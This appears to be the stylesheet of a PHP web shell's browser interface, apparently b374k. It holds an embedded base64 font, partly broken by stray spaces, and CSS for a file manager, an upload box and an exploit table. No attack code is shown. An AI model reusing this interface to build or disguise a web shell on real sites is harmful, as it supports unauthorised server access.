7MzWiaRzPIw9FzqE1GSt1A09tBFbUDsxy4p8gK7WAh2w705U14APNcI1g/1WEyIwwD8EmLhntjcgCeJ/301xPkK+CBt
wTD8uz83PynvFndm/UIABSZZEbGi8Vx0xwXJiZwKbQdjrhZ3i2zc3c3SVotikLS/WChkKvcEeJiRD6OTAh3Ru5Gfc2S
yAhw0Q0K/2302mcwYRF5itxv+FbgxfQ32HI2EHZ9zf3VEIJf2CshdaNj4XNOjVP+HzejJfQhJ21LUk1IyC1HdW1
ZVvucQ5ht1ve9tNH/Pby799Za+sthTlQNoi2rciwersfEqGrcrbXG1LGLKQXSUe4nb5Cig30fvwU0z1n0AD6mKekQA
bt3Tgthd6RL4gFIN0IbBmiYM2S7aCnWHf1luc3ksnME0iSEM0/Wa3WBZ01p7L80ypRUVw8W1o3eRoE1S3k8U5dCd
Gzsswsodcf7VPV4Fhu5cs4YaU5Pbgs9M96ZqiSL1TMSjPrkTpfCWpWS7VG9q2eFv/SJR+3hp3TKqhEMa02oxB6FDCT
GORYIXmZidkU02oj3pVLFwNebJuU11rHO9XjfrUH9FiQrxOlB5Bvusf75cu8ZT/f0jpep8d7L+Ud8gqKq1SYkQoecT1
32X3c/YL7Nfdt9wcu57Kx4i4mZpIssEjgrFoUe4bmlwXADsqjBnoG5Ju/8fZxMlnh1oBqny4In67VmGw6FWNTPXidXM
pAKfSQY+iOkQodd55xmF30fucR57TzivN955ITdYzDTfm3y3XMHMpl56GUEasvIGcTgWgIgcPgXYO6AbET11H0PqJO/s
hHmDiba9gtUgArAdvqxhiPry7g7/cjsPgaPUh/pOJI+Xi6PJyS7MzywBsXjphQ9Bddzz80//cyJaaFsDrZag8kKP/3J
Z5+eC9B5/r3pOCA5gVMPvkP9mZLoXm8iYTBSlNVI fURJfUQ1Xn4QoZAoxmKkFTK1Qz52Ubs4Mk/WYsTj07yu+VdaBM
1YCFSiNZTuiv019PtEGo12fmVNeAhCY4u6JI fPKbB6G34F/2tOLpSvr6xd/y9I/fc82vfTneMDz733Iu49QmKisKM3f
zidh/D5CaKnTOOp86hMV9FNRZoFbtrUEvDgV5kONCLDPfOLwjm9QbW0Acq9CBwECrFCz3SsFyr7hmv1ieEbXgDkCupa
sWuirKhCuePFXROCAfTab+pJp0TwkH5GJIHVav0AdT/jdeWCys6wnrsMsuy48jkdT1dKnUnh1bSE0jXJ2SPmzgyOt06
bi4v1svVw/nAMBhDCFFJOXRbtW9jDWTsv953/sdowTeUVVf4k90Y0MeMRPHSeik2JERau2fyG2L8Jke2XyXc8ikxxF/
+2WuvVv7Zkg9TDD4fk400QbVgVJLIGJQ4h/Cld72YLK4L4MsYUhm9j/hXk+GMWDkkCZRabU93qsF7KtLQY37e/+rF1B
+Rt9Pjv5fyO3/A4LPkA6Lkkg8w2NqfsUA+VB8dJZ+HWC+0PENB+cNBEAshphLHAU+YAPEFRQPeCVJoLzi0t6pgLdvV
MVI3ThfB3j7xtCsZyJgSrGcuJ8VOp3CBozm0CbQYRNGTQZpAe6ShkrGZABr+GMq8LSXCPEDbBveyaeWRJJraBKMZ94
ki9FyyXuUJ7nk9nD0kLycHhTAHwUQKm+Dpv9wXqx5IjTLwDWKys7q2XozAo4NcGtt4+Otvb7c7OTt6+dWD1dd7iBxc
alp6bbe322wN4Jmx76JKP0MRgH6KJ/TOP1gPFEqHzTuvKeQcJv4sqy5jL9eqMYn3Qd9G+8r0xuJhHsWUmVPiRvCsoFv
AKBZfy5tfxTgHv+nmyvHG+aeBdP082/Xwb63gd4017x6ansAwqjBjMnJ50iwm5fSP019aL6Ab8Iv4c41HDUzGug21UN
hbmIjyLwA3SfrVtvdEmFFt9NwT8pkpXUBAtbOLDR4+21/7f8NGPtj/qxz+KWFkmvyM4HI/ByUCogYndyJA/sA7BduEQ

D9oWFdQ5CSAyIQrAdLg6GWJ9JEKBEI7wZWH0JFwZGBsz5HmaGmDVREJcwmS6KiGWdLk98sHwygfmCTx8MgYNVSGkFux
7ViGUAsQHIcD55ukBI2e9GLR2TyWEcHkzCdZyNUiGkQ2bW2ZNDfYxo7AvI1LAHx9+1hgPxTFY3Yka0VjWTBpfkHooZes
yIxZwCqTiZLK2gzTlIH9YWY1zdBwD5UhuuviNt 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
Qf3U/xCQI/gf/rtxyIuIjSy7czRtwwb0RhOyPecYczmQyq6fx6Opr5DqdoeTpdDpN0rqrF0GuFz+m+uQ8Prn5z9WWgDN
FvXvxQJkjlKqz+CiJ4509kQej/APdcHJUAAHgBY2BkAIIZz6IM+O/F89t8ZZBnfgESObW6hA9G/4/+H8Y0k9kOyOVgY
AKJAGcmjQ09AAB4AWNzGZBgtvsfBirf/I/+H800EyiCClgAj80F1wAAAHgBTc8xSwJhHMFxb7Tk4JDRIGZWXHUPiJB
I9lwIerD0dDUCJxvIFqywaUM3IUacosa2tpuqJfR1NzcC2i33/Ag8uH753e3PUt/bc//gkIbPhhTwlKgwhcDOcYwZUJ
GV+tm3ycEtLFEHENGiAZG9QnJYTEqFUONRptUe4smZWLVLH3q5PWvqGt5oMeQkBXeaOFoEEqkHFbpUtUNUVzRjQLDjM
uUCYg551t3F/ikQY098vrTYcAOQyKqTLRuGWG44553HBtkPGsnXFBglXX65BaUMKRe4hXQG+Z6qu7lixG0FLT8KwTrN
XGec0Z1vAcNLCUqjHnhmi4w5UkOOZAbHnmlYCWbmv2M0v/AS9ZPdoAAAAAKgAqAcoAKgBmAJIBGAG+AkYDMANUA7QE
AgRmBIwEvATQBO4FDgXKBgoG1AdWB7IIRAjsCRoKAgqYcQ4KugsECyoLdgvwDKYNQA30DlwOrg7eDwoP1A/ED/AQOBC
QELARWhGgEh4SdbMYE4gUPBREfKwU8hYGFmQWqhbmfWQXIhdAF3QXiBeiGCQYmBjsGVIZ7hpCGuYbOhuOG9wcNhx+HN
wDLB2oHhgeiB60H2IfsB/+IFohPiGeIlyIliMGix4jjiPmI+YkICSGJO4lWCXAJeIm8icqKAwojCjEKNwo5CoAKhQqY
iqWKzor9iwQLF0shjiyYLOAtEilgLYzt/i6iL4QwAjAYMC4wRDBAMH4xeJfSMLoycjKIMqAyuJLQMuyY/DMYM4Az1jOs
M8Iz2DPuNag0ODU2NU41ZDV6NZQ1qjYQNW13FjCqNz43UjDqN4A4SDjgOPY5CjkeOTY5TDliOXg5kjpMOMI6djKOP4
6sjrKOWo7oju408w74Dv4PAw8hDycPNQ9Tj32PjQ+eD7APTQ+6D8YP0Y/dj/QQBxAbkCWQMB44kEAQV5B8EH4QrhDUE
eQAAAAQAAANoAbgAOAE0ABAACABAALwBZAAAFpwevAAIAAXgBLMY/SgNRFMXh37n3JZPhDfkyCBTBIsswQWkdQviG
uwsBcEdiC7A2ixYiriKVfYVWmJh5UDOV33AVteIowsefVH59YNGvZ+c6covVD35Mzq9+nN6ffsN+7j3F6zi029Z5Ylf
GfPS76a/+GtqHvWNTf75PbWmJCot8AC+GDj4wVlHJ3uNfmHQrT/jVM/+nJ0+/Ia7kL9gG29+O/3Hr5znzu+m3/hrhnz
3Nyzzy+8ZSvDfKhWtRg7DwPkU/UCdbJ9KX/fo0+7LQfvuxqoTmtiLo7D0729wdyEEwt1BEYiRR5qJiI7IuOALBQMieh
gEj2hxYAhZj8SORLYjHiE4wRDgiIjru5KfmQMEC3EgLSGnkjwivf6bsyCF+SKV9M1Cx0dnXHM168yxN7ksT0c50hTT
kPnRz1ZcCKnodM0a5AlBS1ivcrr+5JskZec7JvuVA6uxcb5XJ0zcOs/58TiNxsR/AiPwLLjMvqyNyubfsFb3XbGUDsE
LRyemNcuclOVNy3zkJO07unfPm9ffl/qLvsW3e1bmlr5YwDNTxR2fjwloJCaI99nGBGrOmFEnkgx1c5P8oKMj7+c0X1
bn8LqV/uiUjQOs2nRIFZ80MmXz1nyx+YigF9V0qqB4AzPiHcL0n60nOTsfrQO/H9/D2Nc8IyGca3hEFYq003DoUNm1X
DI7PLcNNfr1YUqOFHPdXlqf17wx+98m/sH4qgLH3gBXMFDYgMBAADA2a2trw3btt3G/kw+mc8k98wIgwPzhEc9CgKhB
o2aNGvrqk27Dp26dOvRq0+/AZFBQ4aNGDvm3IRJU6bNmDvN3oJFS5atWLVm3YZNW7bt2LVn34FDR46dOHXm3IVLV67d
uHXn3oNHT569ePxm3YdPX779+PXnX0xcQlJKWkZWT15BUalGEFz0AgAGAAB9n/ydurubacaYjRNTFzadM3HAdE3b0Ov
ps/fEhQgJgJRa0+tRk07t+o0ZDZHa3KnX48u3DnlabHrwac4Xz/+DJwZ8ekeAm6JDqQZNe+E4eOHHuS7NypM1NSfo
h25cK1VC/etEqXJkOWTNkG5ciTK1+BIoWkLxhWqlyZClUqLrtSolqtOq/erbg2bcaNe7dmzVm0ZMu8BduarduwGqJCd
IgjseF/HIyc7KV5mQYgJgZQ2oUnLb+0qLi0ILUoM7+IxbW0KB8kY2RkaAqixQ3c3MC0m5sLiHYzMDAAAFHECrt4ATWM
z0rzQBTFZ77wFRdFRaGIEIKKm2bTR4gdDLFBaJtebRjQ2rUfYoYEKqWsv3TNooiKKLQB+gUN8GNvoGv4M7H0FtqL5d
7zpzfYbTx526v+097mp3TH4OkEv18aPGH+JR+HxjKnT8MCrcY3PjTyrVvKB1stRfEibzE9wnqRT2pnJ8ZShNZAlkdu6
eY15Afoh5h3gveg89A0gJlQT/A7I1SwiJR5mGf7cEu82CHcdhmFdhizdhkLmwwB0rMBhFhLUMnPNya1/GkFKeTPMURP
OScf/FYr0yJS1NuxQ1dqjWYJ0BWOEq5EMTcmEGSueK6E4alp0lKFj43WuC/qcRDclI+s6bYizrcNoUi9bgarmSiDUF
gZJT7FPathtFknLppCtoniRbVMYALsBOUZD5H6CpG1VJerf+FUft+qro6HI/IGMSuJQ4EUd8urMLzJZe0ca) forma
t('woff');

font-weight: normal;
font-style: normal;

```

}
*{
font-family:ubuntumono;
margin:0;
padding:0;
border:0;
-webkit-box-sizing:border-box;
-moz-box-sizing:border-box;
box-sizing:border-box;
font-size:12px;
font-weight:normal;
}
input:focus, select:focus, textarea:focus, button:focus{
outline:none;
}
html, body{

```

```
        width:100%;
        height:100%;
        color:#222222;
    }
    body{
        background:#f0f0f0;
        line-height:17px;
    }
    a{
        text-decoration:none;
        color:#000000;
    }
    a:hover{
        cursor:pointer;
    }
    p{
        padding:8px 0;
    }
    img{
        vertical-align:middle;
    }
    table{
        width:100%;
    }
    table td, table th{
        vertical-align:middle;
        padding:8px;
    }
    textarea, input, select{
        background:#ffffff;
        padding:8px;
        border-radius:8px;
        color:#111111;
        border:1px solid #dddddd;
    }
    textarea{
        resize:vertical;
        width:100%;
        height:300px;
        min-height:300px;
        max-width:100%;
        min-width:100%;
    }
    hr{
        margin:8px 0;
        border-bottom:1px dashed #dddddd;
    }
    video{
        width:100%;
        background:#222222;
        border-radius:8px;
    }
    h1, h2{
        background:#E7E7E7;
        border-bottom: 1px solid #cccccc;
        color:#000000;
        border-radius:8px;
        text-align:center;
        cursor:pointer;
        padding:8px;
        margin-bottom:8px;
    }
    h1 a, h2 a{
        color:#000000;
    }
    pre, #viewFilecontent{
        word-break:break-all;
        word-wrap:break-word;
```



```
}
pre{
    white-space:pre-wrap;
}
#b374k{
    cursor:pointer;
}
#header{
    width:100%;
    position:fixed;
}
#headerNav{
    padding:10px 8px 6px 8px;
    background:#333333;
}
#headerNav img{
    margin:0 4px;
}
#headerNav a{
    color:#efefef;
}
#menu{
    background:#7C94A8;
    height:33px;
    border-bottom:3px solid #CCCFD1;
}
#menu .menuitem{
    padding:7px 12px 6px 12px;
    float:left;
    height:30px;
    background:#7C94A8;
    color:#ffffff;
    cursor:pointer;
}
#menu .menuitem:hover, #menu .menuitemSelected{
    background:#768999;
    color:#ffffff;
}
#menu .menuitemSelected{
    background:#768999;
}
#basicInfo{
    width:100%;
    padding:8px;
    border-bottom:1px dashed #dddddd;
}
#content{
    background:#f0f0f0;
    height:100%;
    padding:66px 8px 8px 8px;
}
#content .menucontent{
    background:#f0f0f0;
    clear:both;
    display:none;
    padding:8px;
    overflow-x:auto;
    overflow-y:hidden;
}
#overlay{
    position:fixed;
    top:0px;
    left:0px;
    width:100%;
    height:100%;
    display:none;
}
#loading{
```

```
        width:64px;
        height:64px;
        background:#7C94A8;
        border-radius:32px 0 32px 0;
        margin:auto;
        vertical-align:middle;
    }
#ulDragNDrop{
    padding:32px 0;
    text-align:center;
    background:#7C94A8;
    border-radius:8px;
    color:#ebebeb;
}
#form{
    display:none;
}
#devTitle{
    background:#ebebeb;
}
.box{
    min-width:50%;
    border:1px solid #dddddd;
    padding:8px 8px 0 8px;
    border-radius:8px;
    position:fixed;
    background:#ebebeb;
    opacity:1;
    box-shadow:1px 1px 25px #150f0f;
    opacity:0.98;
}
.boxtitle{
    background:#dddddd;
    border: 1px solid #cccccc;
    color:#000000;
    border-radius:8px;
    text-align:center;
    cursor:pointer;
}
.boxtitle a, .boxtitle a:hover{
    color:#000000;
}
.boxcontent{
    padding:2px 0 2px 0;
}
.boxresult{
    padding:4px 10px 6px 10px;
    border-top:1px solid #dddddd;
    margin-top:4px;
    text-align:center;
}
.boxtbl{
    border:1px solid #dddddd;
    border-radius:8px;
    padding-bottom:8px;
    background:#ebebeb;
}
.boxtbl td{
    vertical-align:middle;
    padding:8px 15px;
    border-bottom:1px dashed #dddddd;
}
.boxtbl input, .boxtbl select, .boxtbl .button{
    width:100%;
}
.boxlabel{
    text-align:center;
    border-bottom:1px solid #dddddd;
```

```
        padding-bottom:8px;
    }
    .boxclose{
        background:#222222;
        border-radius:3px;
        margin-right:8px;
        margin-top:-3px;
        padding:2px 8px;
        cursor:pointer;
        color:#ffffff;
    }
    .strong{
        color:#7C94A8;
        text-shadow:0px 0px 1px #C0DCF5;
    }
    .weak{
        color:#666666;
    }
    .button{
        min-width:120px;
        width:120px;
        margin:2px;
        color:#ffffff;
        background:#7C94A8;
        border:none;
        padding:8px;
        border-radius:8px;
        display:block;
        text-align:center;
        float:left;
        cursor:pointer;
    }
    .button:hover, #ulDragNDrop:hover{
        background:#768999;
    }
    .floatLeft{
        float:left;
    }
    .floatRight{
        float:right;
    }
    .colFit{
        width:1px;
        white-space:nowrap;
    }
    .colSpan{
        width:100%;
    }
    .border{
        border:1px solid #dddddd;
        background:#ebebeb;
        border-radius:8px;
        padding:8px;
    }
    .borderbottom{
        border-bottom:1px dashed #dddddd;
    }
    .borderright{
        border-right:1px dashed #dddddd;
    }
    .borderleft{
        border-left:1px dashed #dddddd;
    }
    .hr td{
        border-bottom:1px dashed #dddddd;
    }
    .cBox, .cBoxAll{
        width:10px;
```

```
        height:10px;
        border:1px solid #7C94A8;
        border-radius:5px;
        margin:auto;
        float:left;
        margin:3px 6px 2px 6px;
        cursor:pointer;
    }
    .cBoxSelected{
        background:#7C94A8;
    }
    .action, .actionfolder, .actiondot{
        cursor:pointer;
    }
    .phpError{
        padding:8px;
        margin:8px 0;
        text-align:center;
    }
    .dataView td, .dataView th, #viewFile td{
        vertical-align:top;
        border-bottom:1px dashed #dddddd;
    }
    .dataView tbody tr:hover{
        background:#ebebeb;
    }
    .dataView th{
        vertical-align:middle;
        border-bottom:0;
        background:#e0e0e0;
    }
    .dataView tfoot td{
        vertical-align:middle;
    }
    .dataView .col-cbox{
        text-align:center;
        width:20px;
    }
    .dataView .col-size{
        width:70px;
    }
    #xplTable tr>td:nth-child(3){
        text-align:left;
    }
